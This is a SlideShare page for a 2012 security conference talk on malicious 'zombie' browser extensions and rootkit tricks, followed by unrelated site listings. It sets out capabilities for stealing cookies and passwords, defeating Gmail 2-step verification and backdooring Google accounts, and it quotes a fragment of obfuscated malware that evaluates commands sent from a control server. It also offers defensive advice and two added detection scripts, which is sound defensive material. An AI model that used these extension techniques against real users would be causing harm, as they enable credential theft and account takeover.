Introduction


Zoltán Balázs
ITSEC consultant
Deloitte Hungary
Instructor @NetAkademia.hu
OSCP, CISSP, C|HFI, CPTS, MCP
http://www.slideshare.net/bz98


Cyberlympics finals 2012 - 2nd runner up
   Member of the gula.sh team
I love Hacking
I love Zombie movies
I love LOLcats
Zombies + Hacking + LOLcats
 = I R ZOMBIE BROWSER
Zombie browsers,
        spiced with rootkit extensions

                                   Hacker Halted 2012

•   Legal disclaimer:
•   All points of view and thoughts are mine.
•   The contents of the following presentation do not have any connection with my employers' opinions, whether past, present or future.
•   What you will hear can be only used in test labs, and only for the good.
About:presentation

•   History of malicious extensions (add-on, plug-in,
    extension, BHO)

•   Focus on Firefox, Chrome, Safari

•   Advantages – disadvantages

•   Browser extension rootkits

•   Live demo – home made extension
History of malicious
     Firefox extensions
•   90% of malicious extensions were created for Facebook
    spamming

•   2004-2010: 5

•   2011: 5

•   Jan 01, 2012 – Oct 23, 2012: 49*



                                          *Data from mozilla.org
More examples on
          Facecrook








              ©f-secure
My zombie extension
• Command and Control
• Stealing cookies, passwords
• Uploading/downloading files (Firefox,
  Chrome NPAPI on todo list)
• Binary execution (Firefox - Windows,
  Chrome NPAPI on todo list)
• Geolocation
Safari demo
Installing the
     extension
        Physical access
      Social Engineering
Remote code execution – without
        user interaction
Firefox rootkit 1
• Hook into other extensions (even signed ones)
Firefox rootkit 2
• visible = false
Firefox rootkit 3
• seen in the wild
Quick Quiz - for Hacker
       Pschorr
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• *****
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• A***e
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• Adobe in 1995
Risks of a Zombie Browser



• Eats your brain while you are asleep
Risks of a Zombie Browser


• Firewall/proxy 
• Local firewall 
• Application whitelisting 
• Web-filtering 
Risks of a Zombie Browser
•   Cross-platform 
•   Cross-domain Universal XSS 
•   Every secret is available 
    •   Password input method does not matter (password safe, virtual
        keyboard, etc.)
    •   Before SSL (+JS obfuscation)
•   Malicious source codes are available 
•   Advantage against meterpreter 
    •   exe/dll is not needed for persistence
    •   Writing into registry is not needed
Risks of a zombie browser

• Low AV signature based detection rate 
• Sample from January 2011 – October 2012

             0/40




• Extension vs. behavioral based detection 
Friendly message to AV
  developers: try harder…
Code snippets from undetected malicious browser extension
var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74…
_0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39fe[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]];

keylogger_namespace.keylogger…

for(var x in mothership){if (mothership[x].command == "eval")
{eval(mothership[x].data);
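
Added example (not from the original slides or the author's code): a static triage pass a reviewer could run over extension JavaScript to flag the traits visible in the snippets above, namely a table of hex-escaped strings, `_0x` identifiers, and `eval` on received data. The rule names, weights, threshold, watch list and both sample inputs are constructed assumptions.

```javascript
// Added example: static triage heuristics for browser-extension JavaScript.
// Rule names, weights, threshold and both samples are constructed for illustration.

// Constructed sample mirroring the traits in the slide's snippet (not real malware).
const SAMPLE_SUSPICIOUS = String.raw`
var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65"];
for (var x in mothership) { if (mothership[x].command == "eval") { eval(mothership[x].data); } }
`;

// Constructed benign sample: plain strings, no dynamic evaluation.
const SAMPLE_BENIGN = String.raw`
var labels = ["script", "type"];
function greet(name) { return "hello " + name; }
`;

// A string literal whose whole body is \xNN escapes.
const HEX_LITERAL = /(["'])((?:\\x[0-9A-Fa-f]{2})+)\1/g;

// Names worth surfacing when they were hidden behind hex escapes (assumed watch list).
const WATCHED_NAMES = ["createElement", "script", "eval", "cookie", "XMLHttpRequest"];

const REVIEW_THRESHOLD = 4; // assumed cut-off for "needs manual review"

// Turn \xNN escapes in source text into the characters they encode.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Return the decoded value of every fully hex-escaped string literal.
function findEncodedStrings(source) {
  const decoded = [];
  for (const match of source.matchAll(HEX_LITERAL)) {
    decoded.push(decodeHexEscapes(match[2]));
  }
  return decoded;
}

// Apply the heuristics and return findings, a total score and a verdict.
function scanExtensionSource(source) {
  const findings = [];
  const decoded = findEncodedStrings(source);

  if (decoded.length >= 3) {
    findings.push({ rule: "hex-string-table", weight: 2,
      detail: `${decoded.length} fully hex-escaped literals` });
  }

  const hidden = decoded.filter((s) => WATCHED_NAMES.includes(s));
  if (hidden.length > 0) {
    findings.push({ rule: "hidden-api-name", weight: 2, detail: hidden.join(", ") });
  }

  const ids = new Set(source.match(/\b_0x[0-9a-fA-F]{3,}\b/g) || []);
  if (ids.size > 0) {
    findings.push({ rule: "obfuscator-identifier", weight: 1, detail: [...ids].join(", ") });
  }

  // eval()/Function() whose argument is not a string literal: the code comes from data.
  const dynamic = source.match(/\b(?:eval|Function)\s*\(\s*(?!["'`)])[^)]*\)/g) || [];
  if (dynamic.length > 0) {
    findings.push({ rule: "dynamic-eval", weight: 3, detail: dynamic.join(" | ") });
  }

  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  return { findings, score, verdict: score >= REVIEW_THRESHOLD ? "review" : "pass" };
}

console.log(JSON.stringify(scanExtensionSource(SAMPLE_SUSPICIOUS), null, 2));
```

The output is a lead for manual review of the extension, not a malware verdict; legitimate minified code can trip individual rules.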
Profit ...
Firefox
Disadvantages (for the Hacker)

•   Not a real rootkit

•   Browser limitations (e.g. portscan)

•   Platform limitations (e.g. execute binary code only on Windows)

•   Runs in user space

•   Runs only when browser is open

•   Extensions are not yet supported in:

    •   Chrome on Android/iOS

    •   Safari on iOS
Gmail demo
• defeat 2 step verification
• Why Google?
• Hacking “the others” is boring
 • clear text cookies
 • missing 2 step verification
 • no concurrent session detection
One                             to rule them all
•   Cookie + password stealing – defeat Google 2-step verification
•   Use password reset on other sites linked to G-mail (Paypal, etc.)
•   Install any app from Google Play to victim’s Android phone
•   Access Android WIFI passwords
•   Access to Google+, Docs, Picasa, Blogger, Contacts, Web
    history, Checkout, Apps, OpenID
•   Backdooring Google account
    •   Adding application specific password
    •   Stealing backup codes
    •   G-mail mail forward rule
Chrome - rootkit
ChromeOS
DEMO
ChromeOS
DEMO
Not today :-(

no extension install from 3rd
party site

no Flash, no Java, no NPAPI
Zombie Android
         DEMO

• Android SQLite Journal Information
  Disclosure (CVE-2011-3901)
• Android 2.3.7
Firefox webcam
Browser extensions might be bad

•   @antivirus developers

    •   Be reactive

    •   The browser is the new OS

•   @browser developers (Mozilla)

    •   Default deny installing extensions from 3rd-party sites

    •   Chrome-level security

    •   Require permissions

    •   Extension components – separate privileges

•   @browser developers (Google) – keep up the good work

    •   but disable NPAPI :)
Browser extensions might be bad

•   @website developers

    •   There is no prevention against password stealing

    •   Cookie-stealing

    •   Restrict session to IP (by default)

•   @users

    •   Beware of malicious browser extensions

    •   Use a separate OS for e-banking and other sensitive stuff

    •   Removing malicious extensions - create a new clean profile in a clean OS

•   @companies

    •   Control which browsers users can use

    •   Restrict extensions via GPO
One more thing ...
Should I release
 it on GitHub?
References
•   Grégoire Gentil: Hack any website, 2003

•   Christophe Devaux, Julien Lenoir: Browser rootkits, 2008

•   Duarte Silva: Firefox FFSpy PoC, 2008

•   Andreas Grech: Stealing login details with a Google Chrome
    extension, 2010

•   Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011

•   Nicolas Paglieri: Attacking Web Browsers, 2012
Browser extensions might be bad,
                    Mmmkay???
                zbalazs@deloittece.com
                zbalazs4
                hu.linkedin.com/in/zbalazs

                Code released(?) under GPL
                http://github.com/Z6543/
                ZombieBrowserPack

                Greetz to @hekkcamp

ControlCase
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 

Recently uploaded (20)

Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
 

[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions

  • 1. Introduction Zoltán Balázs ITSEC consultant Deloitte Hungary Instructor @NetAkademia.hu OSCP, CISSP, C|HFI, CPTS, MCP http://www.slideshare.net/bz98 Cyberlympics finals 2012 - 2nd runner up Member of the gula.sh team
  • 3. I love Zombie movies
  • 5. Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
  • 6. Zombie browsers, spiced with rootkit extensions Hacker Halted 2012 • Legal disclaimer: • All points of view and thoughts are mine. • The contents of this presentation have no connection with my employers' opinions, whether past, present or future. • What you will hear can only be used in test labs, and only for good.
  • 7. About:presentation • History of malicious extensions (add-on, plug-in, extension, BHO) • Focus on Firefox, Chrome, Safari • Advantages – disadvantages • Browser extension rootkits • Live demo – home made extension
  • 9. History of malicious Firefox extensions • 90% of malicious extensions were created for Facebook spamming • 2004-2010: 5 • 2011: 5 • Jan 01, 2012 – Oct 23, 2012: 49* *Data from mozilla.org
  • 10. More examples on Facecrook ©f-secure
  • 11. My zombie extension • Command and Control • Stealing cookies, passwords • Uploading/downloading files (Firefox, Chrome NPAPI on todo list) • Binary execution (Firefox - Windows, Chrome NPAPI on todo list) • Geolocation
  • 18. Installing the extension Physical access Social Engineering Remote code execution – without user interaction
  • 19. Firefox rootkit 1 • Hook into other extension (even signed ones)
  • 20. Firefox rootkit 2 • visible = false
  • 21. Firefox rootkit 3 • seen in the wild
  • 22. Quick Quiz - for Hacker Pschorr
  • 23. Quick Quiz • Which company developed the first Netscape plugin? • *****
  • 24. Quick Quiz • Which company developed the first Netscape plugin? • A***e
  • 25. Quick Quiz • Which company developed the first Netscape plugin? • Adobe in 1995
  • 26. Risks of a Zombie Browser • Eats your brain while you are asleep
  • 27. Risks of a Zombie Browser
  • 28. Risks of a Zombie Browser • Firewall/proxy • Local firewall • Application whitelisting • Web-filtering
  • 29. Risks of a Zombie Browser • Cross-platform • Cross-domain Universal XSS • Every secret is available • Password input method does not matter (password safe, virtual keyboard, etc.) • Before SSL (+JS obfuscation) • Malicious source code is available • Advantage against meterpreter • exe/dll is not needed for persistence • Writing into registry is not needed
  • 30. Risks of a zombie browser • Low AV signature based detection rate • Sample from January 2011. – October 2012. 0/40 • Extension vs. behavioral based detection
  • 32. Friendly message to AV developers: try harder… Code snippets from undetected malicious browser extension: var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74… _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39fe[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]]; keylogger_namespace.keylogger… for(var x in mothership){if (mothership[x].command == "eval") {eval(mothership[x].data);
  • 35. Disadvantages (for the Hacker) • Not a real rootkit • Browser limitations (e.g. portscan) • Platform limitations (e.g. execute binary code only on Windows) • Runs in user space • Runs only when browser is open • Extensions are not yet supported in: • Chrome on Android/iOS • Safari on iOS
  • 36. Gmail demo • defeat 2 step verification • Why Google? • Hacking “the others” is boring • clear text cookies • missing 2 step verification • no concurrent session detection
  • 37. Gmail demo • defeat 2 step verification
  • 38. One to rule them all • Cookie + password stealing – defeat Google 2-step verification • Use password reset on other sites linked to G-mail (Paypal, etc.) • Install any app from Google Play to victim’s Android phone • Access Android WIFI passwords • Access to Google+, Docs, Picasa, Blogger, Contacts, Web history, Checkout, Apps, OpenID • Backdooring Google account • Adding application specific password • Stealing backup codes • G-mail mail forward rule
  • 41. ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
  • 43. Zombie Android DEMO • Android SQLite Journal Information Disclosure (CVE-2011-3901) • Android 2.3.7
  • 45. Browser extensions might be bad • @antivirus developers • Be reactive • The browser is the new OS • @browser developers (Mozilla) • Default deny installing extensions from 3rd-party sites • Chrome-level security • Require permissions • Extension components – separate privileges • @browser developers (Google) – keep up the good work • but disable NPAPI :)
  • 46. Browser extensions might be bad • @website developers • There is no prevention against password stealing • Cookie-stealing • Restrict session to IP (by default) • @users • Beware of malicious browser extensions • Use a separate OS for e-banking and other sensitive stuff • Removing malicious extensions - create a new clean profile in a clean OS • @companies • Control which browsers users can use • Restrict extensions via GPO
  • 49. Should I release it on GitHub?
  • 50. References • Grégoire Gentil: Hack any website, 2003 • Christophe Devaux, Julien Lenoir: Browser rootkits, 2008 • Duarte Silva: Firefox FFSpy PoC, 2008 • Andreas Grech: Stealing login details with a Google Chrome extension, 2010 • Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011 • Nicolas Paglieri: Attacking Web Browsers, 2012
  • 51. Browser extensions might be bad, Mmmkay??? zbalazs@deloittece.com zbalazs4 hu.linkedin.com/in/zbalazs Code released(?) under GPL http://github.com/Z6543/ZombieBrowserPack Greetz to @hekkcamp
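
Slides 30-32 note that signature-based AV missed the sample and show what its source looked like. The following is an added example, not code from the slides or from the author's project: a small static triage pass that flags those visible traits in an extension's JavaScript, assuming the snippet's strings are \xNN escapes. The function names, rule names and SAMPLE text are constructed for illustration.

```javascript
// Added example: static triage of extension JavaScript for the traits shown on
// slide 32. Function names, rule names and SAMPLE are constructed for illustration.

// Constructed, non-functional sample modelled on the slide's snippet.
const SAMPLE = String.raw`var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x74\x79\x70\x65"];
var el = document[_0x39fe[0]];
for (var x in mothership) { if (mothership[x].command == "eval") { eval(mothership[x].data); } }
var ok = eval("1+1");`;

// Turn \xNN escapes back into characters so a reviewer can read the hidden names.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return one finding per heuristic that fires; an empty array means nothing matched.
function triageExtensionSource(src) {
  const findings = [];

  // 1. String literals made up only of \xNN escapes (three or more in a row).
  const hexStrings = src.match(/(["'])(?:\\x[0-9a-fA-F]{2}){3,}\1/g) || [];
  if (hexStrings.length > 0) {
    findings.push({
      rule: "hex-escaped-strings",
      count: hexStrings.length,
      decoded: hexStrings.map((lit) => decodeHexEscapes(lit.slice(1, -1))),
    });
  }

  // 2. Obfuscator-style identifiers such as _0x39fe (distinct names counted once).
  const ids = new Set(src.match(/\b_0x[0-9a-fA-F]{2,}\b/g) || []);
  if (ids.size > 0) findings.push({ rule: "obfuscator-identifiers", count: ids.size });

  // 3. eval() whose argument is not a plain string literal, e.g. eval(obj[x].data).
  const dynEval = src.match(/\beval\s*\((?!\s*["'`])[^)]+\)/g) || [];
  if (dynEval.length > 0) findings.push({ rule: "eval-of-dynamic-data", count: dynEval.length });

  return findings;
}

console.log(JSON.stringify(triageExtensionSource(SAMPLE), null, 2));
```

Hits are triage signals for manual review of an extension, not a verdict; benign code can also call eval on computed values.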